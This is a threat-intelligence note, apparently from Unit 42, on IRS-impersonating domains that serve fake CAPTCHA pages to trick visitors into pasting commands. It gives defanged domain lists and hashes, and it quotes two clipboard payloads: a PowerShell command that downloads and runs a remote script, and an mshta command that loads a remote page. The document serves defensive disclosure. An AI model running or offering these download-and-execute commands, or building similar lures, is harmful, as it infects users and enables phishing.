2025-04-15 (TUESDAY): IRS-THEMED DOMAINS USED FOR CAPTCHA-STYLE PASTE HIJACKING PAGES

AUTHORS:

- Reethika Ramesh, Zhanhao Chen

REFERENCES:

- https://www.linkedin.com/posts/unit42_pastehijacking-activity-7318017292108185600-TEH_/
- https://x.com/Unit42_Intel/status/1912251671066947928

NOTES:

- Our telemetry reveals a malicious campaign that uses domains impersonating the United States IRS.
- The associated sites returned a "Robot or human?" CAPTCHA-style page that performs paste hijacking. 
- These pages attempt to convince viewers to paste malicious script into a run window.
- The domains use the following two patterns for their fully qualified domain names (FQDNs): 
 -- irs.gov-[a-z0-9]*.<tld>
 -- irs.[a-z]*.gov-[a-z0-9]*.<tld>
- These domain names contain both "irs" and "gov" as part of the FQDN.
- Malicious sites for these domains were active starting in January 2025, but they are no longer online.

TWO EXAMPLES OF DOMAINS:

- gov-tax[.]icu - Registered on 2025-02-22
- gov-tax[.]cyou - Registered on 2025-03-05

FQDNS SEEN FROM THE ABOVE ROOT DOMAINS:

- irs.gov-tax[.]cyou
- irs.gov-tax[.]icu
- irs.fax.gov-tax[.]icu
- irs.org.gov-tax[.]icu

24 OTHER FQDNS RELATED TO THIS CAMPAIGN:

(read: fqdn - root domain registration date)

- irs.gov-cause[.]com - 2025-01-20
- irs.gov-correspondence[.]com - 2025-01-20
- irs.gov-could[.]com - 2025-01-20
- irs.gov-delays[.]com - 2025-01-20
- irs.gov-enter[.]com - 2025-01-20
- irs.gov-expands[.]com - 2025-01-20
- irs.gov-file-aid[.]com - 2025-03-05
- irs.gov-grants[.]com - 2025-01-19
- irs.gov-individual[.]com - 2025-01-19
- irs.gov-instructions[.]com - 2025-01-20
- irs.gov-letter[.]com - 2025-01-20
- irs.gov-manage[.]com - 2025-01-19
- irs.gov-notice[.]com - 2025-01-20
- irs.gov-related[.]com - 2025-01-20
- irs.gov-retreat[.]com - 2025-01-19
- irs.gov-rogas[.]com - 2025-03-05
- irs.gov-selecting[.]com - 2025-01-20
- irs.gov-subsidy[.]com - 2025-01-19
- irs.gov-system[.]com - 2025-01-19
- irs.gov-tax[.]cfd - 2025-02-15
- irs.gov-taxpa[.]com - 2025-01-20
- irs.gov-understanding[.]com - 2025-01-20
- irs.gov-update[.]xyz - 2025-03-17
- irs.gov-verify[.]com - 2025-01-20

TWO EXAMPLES OF HTML PAGES FROM THE MALICIOUS WEB SITES AND ASSOCIATED SCRIPT INJECT INTO PASTE BUFFER:

- SHA256 hash: 9c4bf39efc448dacbaf7051ef9ee8d8c709b48841be90654c1c53befac3c76d3
- Returned from: hxxps[:]//irs.gov-tax[.]cfd/?mt_click_id=mt-x9qfi4-1740022510-220448231
- Script injected into Paste buffer:
   
  powershell -nop -w h -c "[Net.ServicePointManager]::SecurityProtocol=3072;start 
  'hxxps[:]//azure.microsoft[.]com';iex((iwr 
  'hxxps[:]//doordash[.]gifts/catalog3/verify.ps1' -UseBasicParsing) 2>$null)"

- SHA256 hash: 7ec7b41bba47f175c666eb359f31d383feb7162f1b977df4340d5df5abe042e9
- Returned from: hxxps[:]//irs.org.gov-tax[.]icu/
- Script injected into Paste buffer: 

  mshta hxxp[:]//188.34.180[.]125/captch-A.html

MALICIOUS URLS FROM THE ABOVE TWO SCRIPT EXAMPLES

- hxxps[:]//doordash[.]gifts/catalog3/verify.ps1
- hxxp[:]//188.34.180[.]125/captch-A.html
